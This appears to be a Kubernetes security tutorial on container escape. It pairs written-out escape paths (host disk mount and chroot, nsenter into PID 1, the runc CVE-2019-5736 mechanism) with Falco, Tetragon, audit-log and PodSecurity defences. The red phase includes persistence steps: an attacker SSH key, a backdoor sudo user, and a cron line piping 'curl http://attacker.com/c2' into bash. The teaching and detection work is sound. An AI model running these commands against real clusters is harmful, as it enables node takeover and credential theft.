Container Escape Archives

TL;DR

Kubernetes container escape is OWASP A04 + A05: a container deployed with --privileged, hostPID, or hostNetwork is not meaningfully isolated from the host, and from a privileged container three commands are enough to produce a root shell on the node
The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, capabilities, and seccomp. --privileged grants every capability and switches off seccomp and AppArmor, so the kernel no longer restricts what the container can do to the host
Three primary escape paths: privileged container with host device access, hostPID + nsenter (which also needs CAP_SYS_ADMIN), and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the host runc binary during exec
Detection requires kernel-level visibility: Falco fires on exec in a privileged container; Tetragon traces nsenter and mount syscalls at the kernel hook itself rather than relying on a process-name check that can be evaded
The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level: policy that blocks --privileged, hostPID, hostNetwork, and hostPath mounts before a pod is ever admitted
Network policy as a secondary layer: it restricts what a compromised pod can reach, including the Kubernetes API server, which slows lateral movement toward the control plane; it does not constrain a process that has already joined the host network namespace

OWASP Mapping: A04 Insecure Design — --privileged placed in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│              KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE               │
│                                                                         │
│  ┌──────────────────────────────────────────────────────────────┐       │
│  │                     KUBERNETES NODE                          │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (--privileged)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  web app ──▶ exploit ──▶ shell in container          │   │       │
│  │  │                           │                           │   │       │
│  │  │  PATH 1: mount /dev/sda1  │                           │   │       │
│  │  │  ──────────────────────── ▼                           │   │       │
│  │  │  chroot /mnt/host → root shell on node                │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (hostPID=true)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 2: nsenter -t 1 -m -u -i -n -p -- bash         │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           root shell in host PID 1 namespaces         │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (runc CVE)                                 │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 3: overwrite /proc/self/exe during runc exec    │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           arbitrary code execution as root on node    │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  Node root → kubectl access → cluster-admin via node creds  │       │
│  └──────────────────────────────────────────────────────────────┘       │
│                                                                         │
│  DETECTION LAYER        │  STRUCTURAL FIX                               │
│  Falco / Tetragon       │  PodSecurity Restricted                       │
│  mount syscall hooks    │  RuntimeClass (gVisor/Kata)                   │
│  audit logs             │  Seccomp + no-new-privileges                  │
└─────────────────────────────────────────────────────────────────────────┘

Kubernetes container escape is the point where a compromised application pod becomes a compromised Kubernetes node. From a node, an attacker reaches the kubelet credential, the service account tokens of every pod scheduled there, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, capabilities, and seccomp. When you remove those protections with --privileged, you remove the boundary.

The Incident: --privileged “Just for Debugging”

A networking issue in staging. The developer can't get the CNI tracing they need from inside the normal container. Someone adds privileged: true to the container's securityContext (the Kubernetes equivalent of --privileged) to expose /sys/class/net and the raw packet socket. The PR merges. The staging deployment works. The privileged setting stays in the manifest when staging gets promoted to production.

Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.

Inside the container, three commands:

mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because --privileged was set.

The node holds a kubelet credential and the service account tokens of every pod scheduled on it, some with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.

This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn’t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.

Why the Kernel Doesn’t Know About Kubernetes

Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.

Kernel isolation comes from:

Linux namespaces (PID, net, mount, IPC, UTS, user)
  ├── Created by container runtime (containerd, crio)
  ├── Container processes run inside these namespaces
  └── From inside: host PIDs, host network, host filesystem are not visible

cgroups
  ├── Limit CPU, memory, and device access per container
  └── Prevent runaway resource consumption and limit device access scope

seccomp profiles
  ├── Filter system calls the container is allowed to invoke
  └── Block mount, unshare, pivot_root and other syscalls that need CAP_SYS_ADMIN

Capabilities
  ├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
  └── --privileged grants ALL capabilities + disables seccomp + disables AppArmor

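--privileged removes the capability, seccomp, and AppArmor layers simultaneously: it grants every capability, disables the default seccomp filter, and disables AppArmor confinement. It also lifts the device cgroup restriction, so the host's block devices appear under /dev. The namespaces are still there, which makes a privileged container effectively a process running on the host with a different filesystem view. With mount, you can fix even the filesystem view.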

Red Phase: The Three Escape Paths

Path 1: --privileged Container

A privileged container has CAP_SYS_ADMIN, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, /dev/sda1 or equivalent contains the host root filesystem.

Check if the current container is privileged:

# CapEff shows the effective capability set as a hex bitmask
grep CapEff /proc/1/status
# CapEff: 0000003fffffffff

# Decode it
capsh --decode=0000003fffffffff | grep -o 'cap_sys_admin'
# cap_sys_admin: present means mount() is available to this container.
# A fully populated mask (every capability bit set) is the signature of --privileged.
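
Where capsh is not installed in the image, the same decoding can be done by hand, because CapEff is a plain bitmask. The following is a minimal Python sketch under that assumption; the helper names (decode_caps, read_cap_eff) are hypothetical, and CAP_BITS covers only a few escape-relevant capabilities, with bit numbers taken from linux/capability.h.

```python
# Capability bit numbers from linux/capability.h (a small, escape-relevant subset).
CAP_BITS = {
    "cap_dac_override": 1,
    "cap_net_admin": 12,
    "cap_sys_module": 16,
    "cap_sys_ptrace": 19,
    "cap_sys_admin": 21,
}


def decode_caps(cap_eff_hex: str) -> set[str]:
    """Return the names from CAP_BITS that are set in a CapEff hex bitmask."""
    mask = int(cap_eff_hex, 16)
    return {name for name, bit in CAP_BITS.items() if mask & (1 << bit)}


def read_cap_eff(status_path: str = "/proc/1/status") -> str:
    """Extract the CapEff value from a /proc/<pid>/status file."""
    with open(status_path) as fh:
        for line in fh:
            if line.startswith("CapEff:"):
                return line.split()[1]
    raise ValueError(f"no CapEff line in {status_path}")
```

Inside a container, decode_caps(read_cap_eff()) reports which of these capabilities PID 1 holds. A result that includes cap_sys_admin means the mount-based escape described here is available.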

Full escape sequence:

# Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
grep ' / ' /proc/mounts
# overlay / overlay rw,...,upperdir=/var/lib/containerd/... 0 0

# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
# sda      8:0    0   80G  0 disk
# ├─sda1   8:1    0   79G  0 part /
# └─sda2   8:2    0    1G  0 part [SWAP]

# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3a: Write attacker SSH key to host authorized_keys
echo "ssh-rsa AAAA..." >> /mnt/host/root/.ssh/authorized_keys

# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)

# Step 4: From host root, access kubelet credentials
# The cluster CA certificate (public, but it confirms which API server to target)
cat /etc/kubernetes/pki/ca.crt
# The node's bootstrap token / client cert and key for API server access
ls /var/lib/kubelet/pki/

What persistence looks like from node root:

# Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor

# Or: schedule a cron job on the host
echo "* * * * * root curl http://attacker.com/c2 | bash" \
  >> /mnt/host/etc/cron.d/maintenance

Path 2: hostPID / hostNetwork Escape

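hostPID: true is a less obvious escape path than --privileged. When a container shares the host PID namespace, it can see and signal every process running on the node, including PID 1, which runs in the host's full namespace set. On its own that gives an attacker reconnaissance and the ability to disrupt host processes; combined with CAP_SYS_ADMIN and CAP_SYS_PTRACE (both present in a privileged container), it becomes a direct escape.

With hostPID enabled and those capabilities present, nsenter produces a host root shell without mounting anything: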

# From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node

# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash

# Now running in host namespaces
hostname   # shows node hostname, not container hostname
mount | grep " / "  # shows host root mount, not container overlay
id         # uid=0(root) gid=0(root)

nsenter is a Linux utility that enters the namespaces of an existing process. With -t 1 it enters PID 1's namespaces, which are the host's namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.
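
To see from the node which namespaces a given process shares with the host, one option is to compare the link targets under /proc/<pid>/ns with those of PID 1. The sketch below assumes it runs as root on the node; the function names are hypothetical, and proc_root is a parameter only so the logic can be exercised against a fake directory tree.

```python
import os

NAMESPACES = ("mnt", "uts", "ipc", "net", "pid")


def namespace_ids(pid: int, proc_root: str = "/proc") -> dict[str, str]:
    """Map namespace name -> identifier such as 'pid:[4026531836]'."""
    ns_dir = os.path.join(proc_root, str(pid), "ns")
    return {ns: os.readlink(os.path.join(ns_dir, ns)) for ns in NAMESPACES}


def shared_with_host(pid: int, proc_root: str = "/proc") -> list[str]:
    """Return the namespaces that `pid` shares with PID 1 (the host init)."""
    host = namespace_ids(1, proc_root)
    target = namespace_ids(pid, proc_root)
    return [ns for ns in NAMESPACES if host[ns] == target[ns]]
```

A container process that reports pid or net as shared was started with hostPID or hostNetwork. One that reports all five after starting inside a container has most likely been through nsenter.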

hostNetwork: true on its own does not directly produce a root shell, but it exposes the node’s network interfaces and allows binding to host ports. Combined with access to the cloud provider’s instance metadata service (IMDS), it enables credential theft from the node’s IAM role — the attack path covered in SSRF to cloud metadata and IMDSv1 exploitation.

Path 3: runc CVE Escape (CVE-2019-5736)

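CVE-2019-5736 is a different attack class: it does not require a misconfiguration in the pod spec. It exploits how runc handles its own binary while entering a container. A process running as root inside the container can obtain a handle on the host's runc binary through /proc and overwrite it.

The mechanism:

1. Attacker controls a container image, or already has root inside a running container
2. Attacker replaces a binary in the container (for example /bin/bash) with a script whose interpreter line is #!/proc/self/exe
3. Operator runs: kubectl exec -it <pod> -- /bin/bash
4. runc enters the container and executes the target; the interpreter line makes the kernel re-execute /proc/self/exe, which is the host's runc binary
5. Attacker's process in the container opens /proc/<runc-pid>/exe, obtaining a file descriptor that refers to the host runc binary
6. Once runc exits, the attacker reopens that descriptor for writing through /proc/self/fd/<n> and overwrites the runc binary on the host
7. On the next runc invocation, the malicious binary runs as root on the host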

The detection signature for runc-class escapes is writes to /proc/self/exe or writes to paths that correspond to runc’s host binary location from within a container process:

# Simplified bpftrace observation of write() calls (read-only: it blocks nothing).
# As written it prints every write() on the node without filtering on the target file.
# This shows the pattern; Tetragon implements this as a continuous policy

bpftrace -e '
tracepoint:syscalls:sys_enter_write {
  // Track write() calls where the fd points to /proc/self/exe
  // In production: Tetragon handles this at the LSM hook level
  printf("PID %d comm %s writing fd %d\n", pid, comm, args->fd);
}
' 2>/dev/null | head -20

Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the flaw. The practical implication: node patching is the real fix for runc-class CVEs. Pod-level settings such as running as non-root reduce exposure, but no admission policy can repair a vulnerability in the container runtime itself.

Safe Simulation: Audit Your Cluster Before an Attacker Does

These commands are read-only and safe to run against any cluster you have kubectl access to:

# Find all pods running with --privileged
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name, 
     (.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
    join(" / ")' | \
  sort -u

# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.hostPID == true or .spec.hostNetwork == true) |
    [.metadata.namespace, .metadata.name,
     ([(if .spec.hostPID then "hostPID" else empty end),
       (if .spec.hostNetwork then "hostNetwork" else empty end)] | join(","))] |
    join(" / ")' | \
  sort -u

# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.volumes[]?.hostPath != null) |
    [.metadata.namespace, .metadata.name,
     (.spec.volumes[] | select(.hostPath != null) |
      .name + "→" + .hostPath.path)] |
    join(" / ")' | \
  sort -u

# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
  jq -r '.items[] |
    select(.spec.template.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name] | join("/")' | \
  sort -u
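
The four queries above can also be folded into a single pass over the pod list. This is a minimal Python sketch of that idea, not a replacement for an admission policy. The function names are hypothetical, and the input is assumed to be the JSON produced by kubectl get pods -A -o json, already parsed into a dict. Unlike the jq filters, it also looks at initContainers.

```python
def risky_settings(pod: dict) -> list[str]:
    """List escape-relevant settings found in one pod object (kubectl JSON)."""
    spec = pod.get("spec", {})
    findings = []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag) is True:
            findings.append(flag)
    containers = spec.get("containers", []) + spec.get("initContainers", [])
    for c in containers:
        sc = c.get("securityContext") or {}
        if sc.get("privileged") is True:
            findings.append(f"privileged:{c.get('name', '?')}")
    for vol in spec.get("volumes", []):
        if vol.get("hostPath"):
            findings.append(f"hostPath:{vol['hostPath'].get('path', '?')}")
    return findings


def audit(pod_list: dict) -> dict[str, list[str]]:
    """Map 'namespace/name' -> findings for every pod that has at least one."""
    report = {}
    for pod in pod_list.get("items", []):
        findings = risky_settings(pod)
        if findings:
            meta = pod.get("metadata", {})
            report[f"{meta.get('namespace')}/{meta.get('name')}"] = findings
    return report
```

To use it, pipe the kubectl output into a script that calls audit(json.load(sys.stdin)) and prints the result.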

Blue Phase: eBPF Detection

Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with mount, nsenter, or /proc/self/exe. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.

Falco: Privileged Container and Mount Detection

# Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml

# Rule 1: Privileged container started
- rule: Privileged Container Started
  desc: >
    A container running with --privileged was started.
    This removes all capability and seccomp restrictions.
  condition: >
    container.privileged = true and
    evt.type = execve and
    container.id != host
  output: >
    Privileged container started
    (user=%user.name user_uid=%user.uid
     command=%proc.cmdline
     container_id=%container.id
     container_name=%container.name
     image=%container.image.repository:%container.image.tag
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, privilege-escalation, OWASP-A05]

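# Process names of the container runtime, excluded from Rule 2.
# The entries are an assumption; adjust them to the runtime on your nodes.
- list: container_runtime_processes
  items: [runc, containerd, containerd-shim, crio, conmon]

# Rule 2: Mount syscall from inside a container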
- rule: Container Mount Syscall
  desc: >
    A process inside a container invoked mount().
    In a non-privileged container this fails; in a privileged container
    it succeeds and may be mounting host block devices.
  condition: >
    evt.type = mount and
    container.id != host and
    not proc.name in (container_runtime_processes)
  output: >
    Mount syscall from container
    (user=%user.name
     command=%proc.cmdline
     mount_source=%evt.arg.dev
     mount_target=%evt.arg.dir
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, OWASP-A04]

# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
  desc: >
    nsenter or chroot executed from within a running container.
    nsenter with -t 1 enters host namespaces directly.
  condition: >
    evt.type = execve and
    container.id != host and
    proc.name in (nsenter, chroot)
  output: >
    nsenter/chroot executed in container
    (user=%user.name
     command=%proc.cmdline
     parent=%proc.pname
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, T1611]

# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
  desc: >
    A process inside a container is reading /proc entries for PIDs
    that don't belong to it — indicates hostPID=true and enumeration.
  condition: >
    evt.type = openat and
    fd.name startswith /proc/ and
    fd.name endswith /status and
    container.id != host and
    not fd.name startswith /proc/self
  output: >
    Container reading host process status
    (proc=%proc.cmdline fd=%fd.name
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, discovery, T1057]

Tetragon: TracingPolicy for nsenter and Mount Syscalls

Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Falco is a detection engine: it evaluates rules against the event stream and alerts after the fact. Tetragon can also enforce inside the kernel: a matching policy can kill the offending process (Sigkill) or override the call's return value (Override) before the operation completes.

# Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  # TracingPolicy is cluster-scoped, so it takes no namespace
  name: container-escape-detection
spec:
  kprobes:
    # Hook 1: sys_mount — detect any mount() call from a container process
    - call: "sys_mount"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # source device (e.g. /dev/sda1)
        - index: 1
          type: "string"     # target mount point
        - index: 2
          type: "string"     # filesystem type
      selectors:
        # Only fire for container processes (not the container runtime itself)
        - matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              - "host_pid_ns"   # Replace with actual host PID NS value
          matchActions:
          - action: Post        # Post = log; change to Sigkill to enforce

    # Hook 2: sys_execve for nsenter binary
    # (with syscall: true, Tetragon adds the architecture prefix itself)
    - call: "sys_execve"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # filename being executed
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/nsenter"
          matchActions:
          - action: Post

    # Hook 3: write to the host runc binary (runc CVE class indicator)
    # vfs_write sees the resolved file path, not the /proc/self/exe link,
    # so match on the binary's real name (adjust to where your distro installs it)
    - call: "vfs_write"
      return: false
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/runc"
          matchActions:
          - action: Sigkill   # Kills the writer; validate with Post first

bpftrace: Quick Node-Level Validation

Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:

# Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers

bpftrace -e '
BEGIN {
  printf("%-8s %-20s %-30s %-30s %s\n", "PID", "COMM", "SOURCE", "TARGET", "TYPE");
}
tracepoint:syscalls:sys_enter_mount {
  printf("%-8d %-20s %-30s %-30s %s\n",
    pid, comm,
    str(args->dev_name),   // source device
    str(args->dir_name),   // mount target
    str(args->type));      // filesystem type
}
' 2>/dev/null
# Sample output:
# PID      COMM                 SOURCE                         TARGET                         TYPE
# 38471    bash                 /dev/sda1                      /mnt/host                      ext4
# 38471 and comm=bash from inside a container = escape attempt in progress

# Watch for nsenter executions across all processes on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
  if (str(args->filename) == "/usr/bin/nsenter" ||
      str(args->filename) == "/bin/nsenter") {
    printf("nsenter called: pid=%d ppid=%d comm=%s\n",
      pid, curtask->real_parent->pid, comm);
  }
}
' 2>/dev/null

What Kubernetes Audit Logs Show (and What They Miss)

Kubernetes audit logs record API server activity. They show pod creation with --privileged set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.

# Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log pod creation at RequestResponse level (captures full spec)
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods"]
    verbs: ["create", "update", "patch"]

  # Log exec into pods — this is the entry point for escape attempts
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods/exec"]
    verbs: ["create"]

# Parse audit log for privileged pod creation
grep '"privileged":true' /var/log/kubernetes/audit.log | \
  jq -r '[
    .requestReceivedTimestamp,
    .user.username,
    .objectRef.namespace + "/" + .objectRef.name,
    "privileged=true"
  ] | join(" | ")'
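
A plain grep also matches the string anywhere in the event, including response bodies and annotations. A slightly stricter approach is to walk the requestObject of each event, sketched here in Python. The function name is hypothetical, and it assumes the JSON-lines audit format with events logged at Request or RequestResponse level so that requestObject is populated.

```python
import json


def privileged_creations(lines):
    """Yield (timestamp, user, namespace/name, container) for audit events
    whose requestObject is a pod spec with a privileged container."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        ref = event.get("objectRef") or {}
        # Only pod objects themselves, not subresources such as pods/exec.
        if ref.get("resource") != "pods" or ref.get("subresource"):
            continue
        obj = event.get("requestObject") or {}
        spec = obj.get("spec") or {}
        name = ref.get("name") or (obj.get("metadata") or {}).get("name", "?")
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            if (c.get("securityContext") or {}).get("privileged") is True:
                yield (
                    event.get("requestReceivedTimestamp"),
                    (event.get("user") or {}).get("username"),
                    f"{ref.get('namespace')}/{name}",
                    c.get("name"),
                )
```

Feeding it an open file handle on the audit log (for example the /var/log/kubernetes/audit.log path used above) yields one tuple per privileged container in each create, update, or patch request.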

# Note: kubectl get events is not a view of the audit log. Event messages such as
# "Created container app" carry no securityContext fields, so confirm a finding
# against the live pod spec instead (<namespace> and <pod> are placeholders)
kubectl get pod <pod> -n <namespace> \
  -o jsonpath='{range .spec.containers[*]}{.name}{"\t"}{.securityContext.privileged}{"\n"}{end}'

The audit log gap is important to understand: audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape. By the time you see a pod/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.

Purple Phase: Structural Fixes

Fix 1: PodSecurity Admission — Enforce Restricted Profile

PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks --privileged, hostPID, hostNetwork, hostPath volumes, and requires dropping all capabilities.

# Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn't meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # enforce: pod is rejected at admission if spec violates Restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # audit: violations are logged but not rejected (useful for rollout)
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    # warn: user gets a warning but pod is allowed (for migration)
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest

What Restricted profile blocks (relevant to escape paths):

# These settings are REQUIRED by Restricted. Apply them explicitly
# so the PodSecurity admission controller does not reject your workloads

securityContext:
  # Pod-level
  runAsNonRoot: true
  seccompProfile:
    type: RuntimeDefault    # or Localhost with a custom profile

containers:
  - securityContext:
      allowPrivilegeEscalation: false
      privileged: false          # blocks Path 1
      capabilities:
        drop: ["ALL"]            # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
        add: []                  # Restricted permits adding back only NET_BIND_SERVICE
      readOnlyRootFilesystem: true  # not required by Restricted; reduces attacker persistence options

# Pod spec: host-level settings that Restricted requires to be false or unset
spec:
  hostPID: false           # must be false (blocks Path 2)
  hostNetwork: false       # must be false
  hostIPC: false           # must be false
  volumes:                 # hostPath volumes blocked
    - name: app-data
      emptyDir: {}         # emptyDir, configMap, secret allowed; hostPath not
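
Before switching a namespace to enforce, manifests can be checked in CI against the same rules. The sketch below is a hypothetical helper that covers only the subset of the Restricted profile discussed in this article; the real admission controller checks more (allowed volume types, sysctls, AppArmor, and so on). It takes a pod spec as a plain dict.

```python
def restricted_violations(pod_spec: dict) -> list[str]:
    """Check a pod spec against a subset of the Restricted profile."""
    problems = []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if pod_spec.get(flag):
            problems.append(f"{flag} must be false or unset")
    for vol in pod_spec.get("volumes", []):
        if "hostPath" in vol:
            problems.append(f"volume {vol.get('name')}: hostPath not allowed")
    pod_sc = pod_spec.get("securityContext") or {}
    for c in pod_spec.get("containers", []):
        name = c.get("name", "?")
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            problems.append(f"{name}: privileged must be false or unset")
        if sc.get("allowPrivilegeEscalation") is not False:
            problems.append(f"{name}: allowPrivilegeEscalation must be false")
        drops = (sc.get("capabilities") or {}).get("drop") or []
        if "ALL" not in drops:
            problems.append(f"{name}: capabilities.drop must include ALL")
        # Container-level values override pod-level ones.
        if not sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot")):
            problems.append(f"{name}: runAsNonRoot must be true")
        seccomp = sc.get("seccompProfile") or pod_sc.get("seccompProfile") or {}
        if seccomp.get("type") not in ("RuntimeDefault", "Localhost"):
            problems.append(f"{name}: seccompProfile must be RuntimeDefault or Localhost")
    return problems
```

An empty list means the spec passes these particular checks. It does not guarantee admission, which is why the server-side checks remain the source of truth.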

Rollout approach for existing clusters:

Start with warn mode on all namespaces, identify violations, remediate, then promote to enforce:

# Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
  jq -r '.items[] |
    select(.metadata.name | test("^(kube-system|kube-public|kube-node-lease)$") | not) |
    .metadata.name' | \
  while read ns; do
    kubectl label namespace "$ns" \
      pod-security.kubernetes.io/warn=restricted \
      pod-security.kubernetes.io/warn-version=latest \
      --overwrite
    echo "Labeled $ns"
  done

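# Warn mode rejects nothing, so there are no events to search yet.
# Preview which existing pods would violate enforce mode with a server-side
# dry run: it changes nothing and returns a warning per violating pod
kubectl label --dry-run=server --overwrite ns --all \
  pod-security.kubernetes.io/enforce=restricted

# Once enforce is active, rejected pods surface as FailedCreate events
kubectl get events -A --field-selector reason=FailedCreate \
  -o json | jq -r '.items[] | select(.message | contains("violates PodSecurity"))'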

Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads

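For untrusted or internet-facing workloads where a kernel exploit is part of the threat model, and for applications that cannot meet the Restricted profile, the alternative is a stronger isolation boundary: a sandboxed runtime. Host-level agents such as CNI plugins need real host access and cannot be sandboxed this way; handle them with namespace-level exemptions instead.

gVisor intercepts system calls in a user-space kernel (the Sentry) that sits between the container and the host kernel. Kata Containers runs each pod inside a lightweight VM with its own guest kernel. In both cases, a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.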

# Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc   # must match the handler name in containerd/crio config
scheduling:
  nodeSelector:
    runtime.gvisor: "true"   # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-workload
spec:
  runtimeClassName: gvisor   # all syscalls go through gVisor's sentry
  containers:
    - name: app
      image: untrusted-image:latest

# Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata-containers
handler: kata-qemu

For operators: gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.

Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape

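Even without gVisor, a custom allowlist seccomp profile that leaves out mount, umount2, unshare, setns, pivot_root, and ptrace closes most of the escape syscall surface. The illustrative profile below still allows clone without inspecting its flags; to block namespace creation through clone, add an argument filter on the flags, as Docker's default profile does.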

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
  "syscalls": [
    {
      "names": [
        "accept", "accept4", "access", "arch_prctl",
        "bind", "brk", "capget", "capset",
        "chdir", "chmod", "chown", "clock_gettime",
        "clone",
        "close", "connect",
        "dup", "dup2", "dup3",
        "execve", "exit", "exit_group",
        "fchmod", "fchown", "fcntl",
        "fstat", "fstatfs", "fsync",
        "futex", "getcwd", "getdents64",
        "getegid", "geteuid", "getgid", "getgroups",
        "getpeername", "getpid", "getppid",
        "getrlimit", "getsockname", "getsockopt",
        "gettid", "gettimeofday", "getuid",
        "inotify_add_watch", "inotify_init1",
        "listen", "lseek", "lstat",
        "madvise", "mmap", "mprotect",
        "munmap", "nanosleep",
        "open", "openat",
        "pipe", "pipe2", "poll", "ppoll",
        "prctl", "pread64", "pwrite64",
        "read", "readlink", "readv",
        "recvfrom", "recvmsg", "recvmmsg",
        "rename", "rt_sigaction", "rt_sigprocmask",
        "rt_sigreturn", "sched_getaffinity",
        "select", "sendfile", "sendmsg", "sendto",
        "set_robust_list", "set_tid_address",
        "setgid", "setgroups", "setuid",
        "setsockopt", "shutdown",
        "socket", "socketpair",
        "stat", "statfs", "symlink",
        "tgkill", "time", "timerfd_create",
        "timerfd_settime", "truncate",
        "uname", "unlink", "unlinkat",
        "wait4", "waitid",
        "write", "writev"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
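
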